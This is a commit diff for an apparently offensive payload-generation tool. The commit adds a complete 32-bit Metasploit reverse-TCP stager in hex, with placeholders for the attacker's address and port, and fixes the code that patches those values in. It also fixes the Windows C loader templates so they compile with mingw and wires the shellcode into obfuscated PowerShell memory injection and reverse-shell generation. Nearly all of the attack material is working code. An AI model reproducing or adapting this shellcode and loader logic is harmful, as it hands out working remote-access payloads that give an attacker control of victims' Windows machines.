Fix for broken 32bit shellcode and mingw-compile (ISSUE #8)
This commit is contained in:
z0noxz
@@ -283,10 +283,24 @@ class Utility(object):
|
||||
lhost = [byte for byte in lhost if byte >= 0 and byte <= 255]
|
||||
lport = int(lport)
|
||||
if len(lhost) == 4 and lport > 0 and lport <= 65535:
|
||||
return ",".join(hex(b) for b in (list(Utility.binary_array_string(lport))[::-1] + list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3]))))
|
||||
return (",".join(hex(b) for b in list(Utility.binary_array_string(lport))[::-1]), (",".join(hex(b) for b in (list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3]))))))
|
||||
except:
|
||||
Print.error("There is something wrong with the LHOST and LPORT")
|
||||
sys.exit(2)
|
||||
|
||||
|
||||
@staticmethod
|
||||
def replace_all(string, target, replacement):
|
||||
|
||||
target = list(target)
|
||||
replacement = list(replacement)
|
||||
|
||||
for i in range(len(target)):
|
||||
if (i > (len(replacement) - 1)):
|
||||
break
|
||||
string = string.replace(target[i], replacement[i])
|
||||
|
||||
return string
|
||||
|
||||
@staticmethod
|
||||
def load_configuration(configuration):
|
||||
@@ -446,11 +460,11 @@ powershell_block = Utility.enum(
|
||||
)
|
||||
|
||||
|
||||
memory_injection_payload = Utility.enum(
|
||||
METERPRETER = "meterpreter",
|
||||
shellcode = Utility.enum(
|
||||
REVERSE_TCP_64 = "reverse_tcp_64",
|
||||
REVERSE_TCP_32 = "reverse_tcp_32",
|
||||
)
|
||||
|
||||
|
||||
# Placeholder values for powershell blocks with obfuscation techniques
|
||||
obfuscation = {
|
||||
|
||||
@@ -701,7 +715,7 @@ c_source_mb = """
|
||||
c_source = """#include <stdlib.h>
|
||||
#include <windows.h>
|
||||
|
||||
int WinMain(
|
||||
int WINAPI WinMain(
|
||||
HINSTANCE hInstance,
|
||||
HINSTANCE hPrevInstance,
|
||||
LPTSTR lpCmdLine,
|
||||
@@ -747,7 +761,7 @@ c_source_embedded = """#define _CRT_SECURE_NO_DEPRECATE
|
||||
#include <stdlib.h>
|
||||
#include <windows.h>
|
||||
|
||||
int WinMain(
|
||||
int WINAPI WinMain(
|
||||
HINSTANCE hInstance,
|
||||
HINSTANCE hPrevInstance,
|
||||
LPTSTR lpCmdLine,
|
||||
@@ -837,9 +851,10 @@ powershell_blocks = {
|
||||
}
|
||||
|
||||
# Payloads prepared for memory injection
|
||||
memory_injection_payloads = {
|
||||
# metasploit stager for meterpreter. This also works with vncinjection on W7 (but fails on W10)
|
||||
memory_injection_payload.METERPRETER
|
||||
shellcodes = {
|
||||
|
||||
# reverse_tcp stager stager for metasploit.
|
||||
shellcode.REVERSE_TCP_64
|
||||
: "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
|
||||
+ "0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,"
|
||||
+ "0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,"
|
||||
@@ -869,6 +884,26 @@ memory_injection_payloads = {
|
||||
+ "0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,"
|
||||
+ "0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,"
|
||||
+ "0xe7",
|
||||
|
||||
shellcode.REVERSE_TCP_32
|
||||
: "0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,"
|
||||
+ "0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,"
|
||||
+ "0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,"
|
||||
+ "0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,"
|
||||
+ "0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,"
|
||||
+ "0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,"
|
||||
+ "0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,"
|
||||
+ "0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,"
|
||||
+ "0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,"
|
||||
+ "0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,"
|
||||
+ "0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,[_LHOST_]," # << LHOST gets declared here as 4 bytes
|
||||
+ "0x68,0x02,0x00,[_LPORT_],0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68," # << LPORT gets declared here as 2 bytes
|
||||
+ "0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,"
|
||||
+ "0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,"
|
||||
+ "0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,"
|
||||
+ "0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,"
|
||||
+ "0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,"
|
||||
+ "0x1,0xc3,0x29,0xc6,0x75,0xee,0xc3",
|
||||
}
|
||||
|
||||
|
||||
@@ -1447,11 +1482,12 @@ class Listener(object):
|
||||
|
||||
if payload_type == conf_name.METERPRETER:
|
||||
payload = generate_injection(
|
||||
memory_injection_payloads[memory_injection_payload.METERPRETER].replace(
|
||||
"[_LPORT_],[_LHOST_]",
|
||||
Utility.replace_all(
|
||||
shellcodes[(shellcode.REVERSE_TCP_32 if self.os_target == os_target.WIN32 else shellcode.REVERSE_TCP_64)],
|
||||
("[_LPORT_]", "[_LHOST_]"),
|
||||
Utility.local_address_to_binary_array_string(lhost, lport)
|
||||
), self.os_target
|
||||
).encode("utf8")
|
||||
).encode("utf8")
|
||||
|
||||
elif payload_type == conf_name.REVERSE_SHELL:
|
||||
payload = generate_reverse_shell(lhost, lport).encode("utf8")
|
||||
@@ -2379,7 +2415,6 @@ def generate_reverse_shell(lhost, lport):
|
||||
# Generates injection payload powershell block
|
||||
# Generates injection payloads either from templates or from path
|
||||
def generate_injection_payload():
|
||||
global memory_injection_payloads
|
||||
|
||||
# Create an empty holder for an embedded payload
|
||||
payload_embedded = ""
|
||||
@@ -2392,8 +2427,9 @@ def generate_injection_payload():
|
||||
elif Utility.get_configuration_value(conf_name.METERPRETER):
|
||||
payload_embedded = Utility.ps_base64encode(
|
||||
generate_injection(
|
||||
memory_injection_payloads[memory_injection_payload.METERPRETER].replace(
|
||||
"[_LPORT_],[_LHOST_]",
|
||||
Utility.replace_all(
|
||||
shellcodes[(shellcode.REVERSE_TCP_32 if Utility.get_configuration_value(conf_name.TARGET) == os_target.WIN32 else shellcode.REVERSE_TCP_64)],
|
||||
("[_LPORT_]", "[_LHOST_]"),
|
||||
Utility.local_address_to_binary_array_string(Utility.get_configuration_value(conf_name.LHOST), Utility.get_configuration_value(conf_name.LPORT))
|
||||
), Utility.get_configuration_value(conf_name.TARGET)
|
||||
)
|
||||
|
||||
Reference in New Issue
Block a user